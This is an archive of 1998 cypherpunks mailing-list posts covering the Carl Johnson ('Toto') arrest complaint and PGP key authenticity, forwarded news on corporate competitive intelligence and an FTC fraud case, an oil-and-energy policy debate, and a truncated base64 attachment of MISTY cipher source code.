   >   Could our group be charged as a "continuing criminal enterprise" under the
   >   RICO statute?

OH GAWD PLEASE SOMEBODY SHUT DOWN THE MAY RANT-BOT!

---guy ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 9 Sep 1998 16:21:30 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Carl Johnson Warrant and Complaint
Message-ID: <199809092122.RAA08765@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Anonymous <nobody@replay.com>
   >
   >   Note to the clueless guy@panix.com, who asks:
   >   > Entirely unexplained is how one goes from passphrase "sog" (Shit on government?)
   >   > to decrypting the PGP message.
   >
   >   I'm impressed.  You're actually stupider than Jeff Gordon, the IRS flunky.
   >   He was able to figure it out, so why don't you try.  Ask your kindergarten
   >   teacher to give you a gold star once you fumble your way to the answer.

Nice shot: your feet are now on fire.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 18:06:55 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809090416.AAA25585@domains.invweb.net>
Message-ID: <v03110711b21cb8945afa@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:09 PM -0500 9/9/98, Raymond D. Mereniuk wrote:
>William H. Geiger IIIwrote
>
>> Once an alternative fuel source is discovered that is more economical than
>> oil, the arabs will slip back into obscurity.
>
>Good point!  Ever wonder why a decreasing commodity non-
>renewable resource is becoming cheaper as the known reserves
>become smaller?

	Could it be that certain large players (say, the U.K, U.S. Soviet
Union &etc) have a vested interest in cheap oil as long as possible, so
they do things (like create the state of israel, and give it lots of
economic aid) to destablize the region, keep the people of that area at
each others throats &etc. so that OPEC can't agree to control prices...

	Nah, I'm just paranoid.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Sep 1998 17:15:25 +0800
To: cypherpunks@cyberpass.net
Subject: A Cypherpunk Trial, Yes
Message-ID: <199809092216.SAA19854@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote:

>The collection of Toto's keys that he did post and the date he posted
>might be useful to archive at jya.com so that we can see which if any
>of Gordon's claims of proof of authentic Toto messages are valid.

Yes, this is a crucial point. The innuendo of the complaint needs
checking, and read with a heap of salt, although it's probable that 
the Feds have more than revealed so far. They've more fanciful 
stories to spiel of the confabulous material of the Mounties and 
Estevan Bombies, and SS agents and bunkered magistrates 
and imperiled Cindys needing protection from the Killer Bots.

To hawk tickets we have added links within the complaint to all 
the Cpunk messages cited, but for those who don't want to 
download it again or search the archives, here they are 
chronologically:

   http://jya.com/jg062397.htm
   http://jya.com/jg090497.htm
   http://jya.com/jg120997.htm
   http://jya.com/jg121497.htm
   http://jya.com/jg060898.htm (not June 10, as in the complaint; thanks to
jeff-anon)
   http://jya.com/jg072598.htm
   http://jya.com/jg072798.htm

It was a pleasure to reread Toto(s)'s stuff while searching the 
cpunk amazing archives -- what a waterfall from everyone of free 
association, tants, jibes, potshots and richochets and self-mockery. 
I now believe the report from TX that Carl's got an IQ off the charts
like all cpunks off the wall.

It's worth keeping in mind that multiple users of pseudonyms is
not unusual, at least among artists long before the Internet, and 
not only performance group e-mailers like the Totos, CJ Parkers, 
XxxMongers, Gus-Peters and endless Anonymees jostling for
unrecognition.

Two venerable and heavily-used nyms in Europe are Luther Bissett 
and Monty Cantsin. A dazzling Monty Cantsin posted here for a 
while. A Luther Bissett message ridiculing the recent kiddie porn
sweep was posted to Cyberia a few days ago. But these pseudonyms 
and others are frequently used to taunt uptight authoritarians by 
substantial numbers of people, sometimes acting in concert but 
most often acting alone.

An exemplary case of acting up like the Totos and other performance
pseudo-Feynmann's here, is that of Dario Fo, the Italian artist who 
recently won the Nobel Prize. His off the chart genius, too, was in 
mixing the real and imaginary to challenge, and to frighten, authority 
into revealing their treacherous deception of the real and imaginary 
to maintain state and religious control century after century, culture
after culture. He, too, was regularly condemned by those obsesses
with holding onto power, and sometimes arrested, for his imitations
of them at their most buffoonish and serious.

Fo is from an earlier generation, though, and what more agressively
offensive form is suitable for those younger we may be witnessing in 
the Jim Bells, Unknown Arrestees, and those here not yet projected 
onto the world stage but working the crowd most effectively.

Black Unicorn, step up to the mike. Show magic.

In any, case, I'm delighted to see Cypherpunks get credit in the Johnson
pseudo-complaint for hosting transgressive art appropriate for the age of 
widespreading disinformation. A tumultous trial to amplify this forum's 
mayhemic virtues and vices would be magnificently chaotic and hopefully 
anarchic to the max. 

Pray for CJ to get an equally mad attorney to demand his day, and our day, 
in court. This under-recognized witness is eager for a highly offensive 
part to play, a gibbering idiot like Toto(s), you bet, I admire their style of
spleen and threat to the fools of seriousness.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 10:47:50 +0800
To: users@einstein.ssz.com (SSZ User Mail List)
Subject: SSZ down (whatta story!)...
Message-ID: <199809092353.SAA17964@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Sorry for the downtime but a big (40ft.) tree fell and took out the phone
lines, nearly squished one of my dogs, and had the power lines under some
considerable tension.

If you're receiving this then everything should be back up and operating
normaly. No further downtime is expected.

Now back to your normal bat channel...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Thu, 10 Sep 1998 17:38:57 +0800
To: Jim Van Over <amp@pobox.com
Subject: Re: PGP5.5.5 Problem
In-Reply-To: <35F6A8B2.CCB6D9FF@earthlink.net>
Message-ID: <3.0.5.32.19980909191149.007dfb50@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:11 AM 9/9/98 -0700, Jim Van Over wrote:
>I am seeking assistance with a PGP 5.5.5 system and noting your comments
>on the net I thought it might be possible for you to help me with a
>solution.
>
>I have been using PGP5.5.5, successfully, for the past four months.
>However, beginning three days ago I began experiencing a problem.  I am
>using Netscape Navigator and the Netscape Message Center.  The problem:
>When I receive a PGP message I copy it to the clipboard, but, when I
>depress the "decrypt and verify" line on the PGP tool bar the screen for
>the "pass phrase" flashes briefly on the screen and disappears.  The


Are all the keys you're sending to VERIFIED?   Launch PGPKeys.










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 21:28:23 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Casual Talk Can Produce Wealth of Corporate Intelligence Data
Message-ID: <199809100229.TAA03175@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Richard Sampson <rjsa@sprintmail.com>
Subject: IP: Casual Talk Can Produce Wealth of Corporate Intelligence Data
Date: Tue, 08 Sep 1998 22:42:21 -0400
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>

 Casual Talk Can Produce Wealth of Corporate Intelligence Data
Sep. 6 (The Record/KRTBN)--"Spies are the most important element in war,

" Sun Tzu wrote in "The Art of War," "because upon them depends an
army's ability to move."

The man in this story is one such spy, but his battlefield isn't a
blood-soaked Third World country, and his army wears no uniforms and
carries no guns. His battlefield is the grand panorama of world
commerce, his army a well-known, high-tech company in North Jersey.

This man -- he spoke on condition of anonymity -- for four years has
been the company's director of competitor intelligence. His job is to
study competitors and gather information his company can use to make
strategic decisions on everything from mergers to new-product launches
to pricing.

Unlike covert operatives -- who engage in all sorts of skulduggery to
gather information, from phone taps to undercover work -- he relies on
public sources: the Internet, government documents, published reports,
and trade shows.

Beyond that, his greatest resource is the eyes and ears of company
employees: the salesman who regularly encounters competitors on the
plane, the executive who hobnobs with officers from other high-tech
companies, the company spokesman who deals with the media, the
secretary who answers the phone.

"Eighty percent of what you need to know about your competition is
already in your company," he said. "You just don't know where it is."

On the Internet, this corporate spy will monitor competitors' Web
sites, and also his company's own, using software tools that allow him
to determine who is visiting the site and which pages they're viewing.
Since many competitors use aliases, additional research is necessary to
determine who is targeting the site.

He also monitors chat groups on the Web to determine who is discussing
his company in cyberspace.

Within the company itself, "several dozen" people are assigned
competitive intelligence functions, including human resources
personnel, secretaries, and press officers. But everybody is in on it.
Airline tickets issued to employees carry a suggestion to be
"competitor aware," a subtle reminder to keep eyes and ears open at all
times and to make sure they don't inadvertently leave documents where
competitors can find them.

And, according to the spy, it works. Here's how:
 In one instance, a salesperson preparing to demonstrate a product for
a customer was asked if any special equipment was needed. When the
salesperson requested a specific type of monitor, the customer said it
wouldn't be a problem, since a competing high-tech company had recently
requested the identical monitor.

>From that bit of information, the salesperson was able to determine
which product his competitor was pitching and to tailor his
presentation to point out the weaknesses in the competitor's product,
allowing him to close the sale.

In another instance, a salesperson called up a customer and discovered
that another company had begun offering a deep discount on a competing
product. The move was initially interpreted as a "full court press" to
gain market share, and the company began contemplating deep discounts
of its own.

But within 24 hours, the competitive intelligence unit -- using media
reports and the Internet -- was able to determine that the competitor
was trying to decide whether to discontinue the product. Salespeople
were dispatched with instructions to inform customers of that fact -- a
so-called FUD mission, since it instills "fear, uncertainty, and doubt"
in customers -- and a potentially devastating price war was averted.

"It was a bullet avoided," he said.
 The corporate spy's true forte, however, is the trade show, where
dozens of companies gather to hawk their wares, and schmoozing is the
order of the day.

As many as a dozen operatives will be employed to gather information
at a trade show, each one assigned to a specific exhibition booth,
panel discussion, or press conference.

One might sidle up to a human resources representative at a
competitor's exhibition booth, start a conversation about the
difficulty of finding good employees, and walk away minutes later with
the number of employees the company hired for a specific unit.

Another might collar a reporter for the trade press and pump him for
information. Another might be assigned to stake out the restaurant
where the executives from a competing company gather for breakfast
every morning. Another might hurl questions at a competing executive
who is speaking at a panel discussion.

"A lot of times you can ask them a question from the floor," he said.
"You never hear them say, 'Who do you work for again?' "

Within 24 to 48 hours, all the operatives will write down what they
have learned, which is then analyzed and condensed into a document for
distribution within the company.

The corporate spy says his operatives adhere to a strict ethics code
that prohibits them from misrepresenting who they are  and what they
are doing. The code also prohibits theft, trespassing, and other
illegal acts.

But he said the inability of most people to refrain from casual
conversation with a friendly stranger makes such tactics unnecessary.
What remains vitally necessary, however, is making the best use of the
information at one's disposal.

"You're not seeing Reds under the bed," he said, an allusion to Cold
War-era spying that targeted Communists. "You're trying to extend your
product cycle by six months. And you have to be aware that information
can sink you in a hurry."

By Louis Lavelle

-0-
 Visit The Record, Hackensack, N.J., on the World Wide Web at
http://www.bergen.com

(c) 1998, The Record, Hackensack, N.J. Distributed by Knight
Ridder/Tribune Business News.  END!A$9?HK-BIZ-SPY


News provided by COMTEX.
[!WALL+STREET] [ARMY] [ART] [COMMERCE] [CONFERENCE] [CORPORATE]
[GOVERNMENT] [INTERNET] [KRT] [MARKET] [MARKET+SHARE] [MEDIA] [NEWS]
[NEWSGRID] [RESEARCH] [SOFTWARE] [TRADE] [USA] [WAR]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 21:28:27 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FTC: Internet merchant barred for life from "net-based" commerce
Message-ID: <199809100229.TAA03186@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Richard Sampson <rjsa@sprintmail.com>
Subject: IP: FTC: Internet merchant barred for life from "net-based" commerce
Date: Wed, 09 Sep 1998 15:10:43 -0400
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>

FTC: Internet merchant barred for life from "net-based" commerce
 SEP  9, 1998, M2 Communications - An Internet "entrepreneur" who
advertised low priced computers in online auction houses and collected
the sales price but never delivered the goods would be barred for life
from conducting any Internet commerce, under the terms of a settlement
with the Federal Trade Commission. The defendant, who did business as
Experienced Designed Computers and C&H Computer Services, would be
prohibited from advertising, marketing or selling goods or services via
the Internet, from making misrepresentations about any goods or
services he sells and from violating the Mail or Telephone Order
Merchandise Rule.

The defendant, Craig Lee Hare, also known as Danny Hare, operates
from Lake Worth, Florida.

In April, 1998, the FTC alleged that Hare had used online auction
houses to offer new and used computers for sale. After "successful
bidders" paid as much as $1,450 per computer, Hare provided them with
neither the computer nor a refund. At the request of the FTC, a federal
district judge issued a temporary restraining order and froze Hare's
assets, pending trial. The agency asked the court to issue an
injunction permanently barring Hare from violating the FTC Act and the
Mail or Telephone Order Merchandise Rule. The stipulated permanent
injunction and final judgment announced today would settle those
charges.

The settlement would permanently bar Hare from participating in any
online commerce. It also would bar him from misrepresenting his
identity in commercial e-mail and misrepresenting any fact that is
material to a consumer's decision to purchase any goods or services in
any form of commerce. In addition, the order would prohibit future
violations of the Mail or Telephone Order Merchandise Rule. Finally,
the order provides record keeping provisions to allow the FTC to
monitor compliance.

Stephanie J. Herter, also known as Stephanie Branham, also entered in
a settlement with the Commission. She was named in the FTC complaint
against Hare as a relief defendant because checks Hare received from
consumers were deposited in her checking account. In settlement of the
charges against her, Herter will release Hare's funds in that account
to be used for consumer redress, or, if that is impractical, to be
deposited into the U.S. Treasury.

The stipulated permanent injunctions were filed in the U.S. District
Court, Southern District of Florida, West Palm Beach Division.

NOTE: These consent judgments are for settlement purposes only and do
not constitute an admission by the defendants of a law violation.
Consent judgments have the force of law when signed by the judge.

Copies of the complaint, Stipulated Final Judgment and Orders and a
consumer alert, "Online Auctions: Going, Going Gone!" are available
from the FTC's web site at http://www.ftc.gov and also from the FTC's
Consumer Response Center, Room 130, 6th Street and Pennsylvania Avenue,
N.W., Washington, D.C. 20580; 202-FTC-HELP (202-382-4357); TDD for the
hearing impaired 202-326-2502. To find out the latest news as it is
announced, call the FTC NewsPhone recording at 202-326-2710.

-0-



(C)1994-98 M2 COMMUNICATIONS LTDCONTACT: Claudia Bourne Farrell,
Office of Public
Affairs
Tel: +1 202-326-2181



*M2 COMMUNICATIONS DISCLAIMS ALL LIABILITY FOR
INFORMATION PROVIDED WITHIN M2 PRESSWIRE. DATA
SUPPLIED BY NAMED PARTY/PARTIES.*


News provided by COMTEX.
[!BUSINESS] [!HIGHTECH] [!INFOTECH] [!WALL+STREET] [ADVERTISING]
[BUSINESS] [COMMERCE] [COMPUTER] [CONSUMER] [E-MAIL] [FLORIDA]
[INTERNET] [MARKETING] [MTO] [NEWS] [NEWSGRID] [ONLINE] [PENNSYLVANIA]
[SALES] [TRADE] [TRIAL] [USA] [WASHINGTON]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 15:40:02 +0800
To: cypherpunks@cyberpass.net
Subject: Toto posted his keys?
In-Reply-To: <ed4d64ff287d4e98c0e76cdc3d0e33cf@anonymous>
Message-ID: <199809091857.TAA03261@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous notes:
> Gordon writes in the arrest note posted to jya.com:
> : [...]  In other words, only the person possessing the
> : secret key found on JOHNSON'S computer could have generated the "death
> :  threat" message.
> 
> Why would you claim only one person possessed the secret key? As you
> doubtlessly know, some of the TruthMonger secret keys have been posted
> to Cypherpunks anonymously. This is not authentication. Thank you.

Would you happen to recall the subject field or approximate date of
this message?  

(It's kind of difficult to search for Toto posts on various topics
because the From line is mostly forged, via a remailer, or forged as
coming from a remailer.  Ditto for the author, using a different nym
each time: TruthMongrel, DeathMonger, etc.)

The collection of Toto's keys that he did post and the date he posted
might be useful to archive at jya.com so that we can see which if any
of Gordon's claims of proof of authentic Toto messages are valid.

(I've got a set of archives going back to May 96 in RMAIL format, btw
if anyone wants to redo Ryan Lackey's `complete cpunks archive'.)

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 15:38:43 +0800
To: tcmay@got.net
Subject: Re: Carl Johnson Warrant and Complaint
In-Reply-To: <v03130302b21b96053fd9@[209.66.100.149]>
Message-ID: <199809091912.UAA03276@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May writes:
> As I'd been deleting nearly all of Toto's stuff unread, I missed all the
> stuff about (allegedly) threatening to bomb the RCMP. I recall seeing his
> "AP Bot" and "Dead Lucky" items, which came out before I was deleting all
> of his stuff.

It is kind of amusing that this FBI agent has been methodically
analysing Toto's posts when few if any here have read them all.
Particularly the one which apparently was sent to the list encrypted
with the password included -- I wonder if this FBI agent was pretty
near the only person who read it!  (I don't recall seeing the
message.)

It would seem that Toto's tendency for magical thinking, and his
theories on `synchronicity' are contagious, and that the FBI agent
ended up being drawn into Toto's magical thinking, conspiracy theory
filled world and imagining all kinds of hidden meanings in Toto's
posts.

Most of Toto's messages were fictional works such as `WebWorld', and
the others, cynical rants, conspiracy theories, etc.  No one here had
the faintest idea that any of this stuff was connected with reality.

One wonders about the Xenix chainsaw massacre, and the suitcase
nuke... fact or fiction :-)

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 10:49:16 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
Message-ID: <199809100116.UAA18005@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 9 Sep 1998 11:29:14 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)

> 	There are lots of things you can make alcohol out of. Seaweed, etc.

True, but the amount of land needed to replace the oil reserves is a tad
excessive...

> for importation into the US.

Why? It's in their best interest to use the product in their own country.

> 	And what would you need to add to it to "color" the flame?

Indy racers  add various things to make it burn (usualy a orange) but I
don't have any references at hand and don't remember. Sorry I can't answer
that one specificaly.

> 	Put about 2% detergent (just about any grade will do) into that
> "water spray", and the fire goes out quicker, and stays out longer.

That'll work for gasoline because soap and gasoline are soluble. I doubt it
would work very well for alcohol but once I get this mess with the tree
straightened out I'll do a little backyard experiment.

What I had in mind was to pour some alcohol on the concrete drive way and
light it. Then use a waterbottle with a water/soap mix. Do you think that
would be a suitable simulation?

> 	There are plenty of unused roof tops here in Chicago bouncing free
> energy off into the air.

Yep, use the roof of every 10+ houses to power a single house...

> 	Again, there are a lot of tall buildings here where the wind is
> constantly moving. Also, we have this large, flat, relatively undeveloped
> area just to the east of chicago where the wind is constantly at least 10
> m.p.h. (from (admittedly imperfect memory) 7 m.p.h. is necessary to run an
> electric generator from a windmill) and where no one lives.

Ok, so you have acres and acres of power turbines on towers around Chicago,
where does Chicago move to? What about the rest of the country? The issue
after all is what happens when a renewable *replacement* for oil based fuels
is found? This is a much more global issue than Chicago. Besides putting a
wind generator on a building wouldn't even power the building.

> 	It's called Lake Michigan.

Ok, something got lost here...

> 	No, but it is PART of the solution.

Actualy it's not, if anything the pollution of mining, production, byproducts
of use such as acid rain, and some I've probably left out are only an
extension of the problem. The ignorance of long term costs of disposal and
ecological impact is one of my personal pet peeves with traditional economic
theory and why I pretty much think it's a pile of shit and economist in
general are idiots.

> 	Again, PART of the solution.

Ok, so we let PART of the people starve and die in the dark.

> 	The waste problem goes away of you build a decently stable launch
> platform and drop the shit into the sun.

We don't have engines at this point that can do that. The fact is that it
takes more energy to get to the sun than it does to leave the solar system.
Nope, not the answer. (I do experimental, ie big bird, rockets for grins and
giggles)

> "power sats" into orbit (altho I am not real clear on how the energy gets
> back down, something about using microwaves <shrug>)

Microwaves, and god help you if you happen to fly through one. I won't even
talk about the costs of development, control, maintenance, etc. This won't
fly any time in the next couple of hundred years at least. What about the
heating of the water in the air, can you say global warming on a scale that
would make the current issues irrelevant.

> 	Also, you ignored, or didn't see the "mix of" statement. Oil CAN be
> replaced, and should be. There are plenty of ways to replace the energy

Absolutely, I want to replace it. I want to replace it with something that
is renewable, won't have the ecological impact of the others, won't squeeze
the small countries out, etc. If it requires killing a single salamander
then it's the wrong choice simply to make a profit.

> for clean air as much as the next guy, and I guess trees are kinda nice to
> look at, but I'd like to see far more diversity in energy sources, and
> investigation into more long term, renewable sources.

I love trees.

The problem is that there aren't that many renewable resources that won't
break the bank or create a have/have-not situation that would be rife with
conflict potential.

> 	Actually it looks like something that could be made in a factory.
> Take a methane source (sewage, rotting plant matter) pump it into really
> cold water under pressure, and blam.

You need pressure as well. But yes, this is a possibility as well. I
haven't seen the energy costs on this approach. The largest producers of
methane on the planet are cows. Perhaps we should shove a hose up the hinney
of all the cows...:)

> 	Depends on what you want it to replace. The one of the largest uses
> of oil is in the transportation sector, and "they" have been pushing
> Natural Gas there for years to little effect.

Absolutely, there is a hurdle to jump. One of the main issues with the
traditional natural gas deposits are that they are expensive because of the
drilling requirements, non-renewable, and not evenly distributed to
potential users. Something deep-ocean clathrates and potentialy your
industrial process idea don't have.

    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 10:49:20 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
Message-ID: <199809100135.UAA00119@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 9 Sep 1998 09:58:16 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism

> >Sure thing, and where you live, exactly who's land was it before you got
> >there?
> 
> 	Point is, the "Arabs" didn't start it, the UN/European leaders (US,
> UK, FR, and RU) did.

Actualy the tension between followers of Allah and Yahwe split long before
us poor westerners were doing much more than getting naked, painting
oursleves blue, and stabing each other with bronze and iron rods.

While it is true the modern political scene has exacerbated the situation,
it is untrue that it was the causation.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Date: Wed, 9 Sep 1998 22:35:49 +0800
To: Petro <whgiii@invweb.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809092123.OAA17355@leroy.fbn.bc.ca>
Message-ID: <199809100350.UAA17882@leroy.fbn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain



Petro <petro@playboy.com> wrote

>Could it be that certain large players (say, the U.K, U.S. Soviet
>Union &etc) have a vested interest in cheap oil as long as possible, 
>sothey do things (like create the state of israel, and give it lots of
> economic aid) to destablize the region, keep the people of that area at
> each others throats &etc. so that OPEC can't agree to control prices...
> 
> 	Nah, I'm just paranoid.

"William H. Geiger III" <whgiii@invweb.net> wrote

>Most of these countries are economically "one trick ponies" and 
>have little export revenue outside of oil. Because OPEC <sp?> has 
>been a failure at enforcing production quotas there is a surplus of 
>oil on the market thus driving down the cost (supply and demand).

As William stated most of the OPEC nations are economic "one trick 
ponies" whose leaders don't see the big picture and the benefits of a 
cartel where all members co-operate.  Israel was part of the 
justification for screwing the world for more money in the so called 
70s oil crisis.  I would think that if the Arabs didn't have Israel to hate 
they would find some other group.

If you go back to the late 40s you will find many political deals done 
by the British which didn't make a lot of sense.  The British walking 
out of Burma and turning political control over to whoever the goofs 
are that ruined that country made no sense whatsoever.  The British 
turned political control of Malaysia over to the ethnic Malays where 
the Malays are not the original people of that region.  The Malays 
were immigrants much like most of the Chinese, they just got there 
300 years earlier.  

Falling oil prices probably hurt the USA and Soviet governments 
more than any possible benefit.  The Soviets export oil so they are 
hurting.  The US and most other western style democracies tax oil 
products based on its wholesale cost and retail selling pricing so 
they would see reduced revenues.

>There are also large reserves of oil in Alaska, Siberia and 
>elsewhere that are going unused along with other reserves that are 
>too expensive to extract the oil at current market prices. The so 
>called "oil shortage" of the 70's had more to do with Oil Companies 
>profiteering than it did with any actual shortage. I have seen 
>estimates in the past of our domestic oil reserves showing that we 
>have enough oil to last another 100 years at out current rate of 
>increased consumption if we stopped all imports today. Simple 
>economics is that it is cheaper for us to import it than it is to
>produce it domestically.

You can add possible large reserves in the Canadian Arctic.  The oil 
companies started to find it and they tried to think of a way to 
transport it.  The Canadian gov't vetoed all the transportation 
alternatives so the oil companies stopped exploration.

The middle east countries do have the oil reserves with the lowest 
cost of production.  Most reserves in North American are moderate 
to high cost of production.

Now if you want to be paranoid....   Before the 70s energy crisis we 
all drove big cars which had no problem doing the 65 MPH speed 
limit and back then we used to pass on two-lane highways.  The 
energy crisis came and we all accepted gutless foreign made small 
cars which consumed less energy and had a problem with the 55 
MPH speed limit and passing was impossible on a two-lane highway 
even if we found a section which was not double-lined.  

Now we have cheap oil.  Big powerful vehicles are back and we are 
not embarrassed to consume energy any more.  I have no idea 
where society is heading but I do like have a more powerful vehicle 
which capable of passing a vehicle already doing 65 MPH.

>As much as the Greens whine and cry about alternative fuels, the 
>simple fact is that as long as oil is cheap no one is going to switch. 

The whole Greens or tree-hugger thing is a bit hypocritical.  Ask 
them if they have electrical appliances in their home and the answer 
is always yes.  For a number of years the Greenpeace fundraisers  
would show up at the door asking for money to battle the forest 
industry and the evil pulp mills which used chlorine in their bleaching 
process and they would have white paper in their clipboards.




Virtually

Raymond D. Mereniuk
Raymond@fbn.bc.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Wed, 9 Sep 1998 23:08:16 +0800
To: cypherpunks@toad.com
Subject: MISTY encryption algorithm source code
Message-ID: <19980910035745.18097.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713798.multipart/mixed"

--Boundary..3996.1071713798.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

MISTY source code posted by me at long ago had many mistake.
Attachment file are revised MISTY source code and revised readme.
Thanks.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com


misty.zip


--Boundary..3996.1071713798.multipart/mixed
Content-Type: application/octet-stream; name="zip00000.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="zip00000.zip"
Content-Description: ""

UEsDBBQAAAAIAASQHyU4NhnvRgkAAOQZAAAHAAAAbWlzdHkuY9VYa08k1xH9
jsR/uFEkBOxYdD36JZaVongjWUmcKLaUWIi1eqGBCSyshiZZYu9/zznVPQM9
NJOs8ylYvTN9b1XdqlOnqu74YP+L/ra39tOX/A0Kf/zmu+9/SM31xe1i3l3O
P/xHhb9Crk3vH9K3t+/vr+bp2+aq6e7/Pn9R4c/XbXPXpkXbnMU/H9p0Pr9u
n8unXxrDb28/PizmF5ddkrouU/rN9XWK9zsceNcu/tGejRX++79fpPAlfwfb
W/xv/+CgTwVfuoeP7Vl7nu5v7uYXN3D+7vJ20aX7+Dic2D+9bBYp3fPjkAZ6
yfT2b9///u0Px35yXJ3E+l3XdPPTXjB9Vx6LVidHP21vJS1nKc/wyCzV/Kxn
SYpZUpulyrGGdS1mIo4nn0kGecf3TGeptBksGCQMGlJjtYKFHBJ4L2ChpAV8
QjMV+F5h3WCholXIJqcFwVuJsw02xWbCs3M8BSQKaDi+G/YLWFF8lvBDaUHg
k4QF2sZugvc5PaU/Cn8YBR6HlmTQwnqOJ+GkBD9qWg8LCm2poAG7zhgZCT4T
1xgFz4QVZ9zAI6M/iFggU4SFCmeXtMszS0hDq8RazSggrfhu2KuxbsSKqNIa
M1DRQkI8GW1Cuoa0MhJqMTI8Bl+EqNEPrDt9QpTMYV2GD0QR9ulVQmwlUcIZ
Fc+hNlElLswHz8V6zX3sAYHPE1ypj3PR4IqDIwpEDd47MupAVhGRkjvIlyED
gkeBj4M3Rq6k3k+NPKFIoZ0FR5gLRWSGfDisOrATcEbJEeYSLCNmjogN8orY
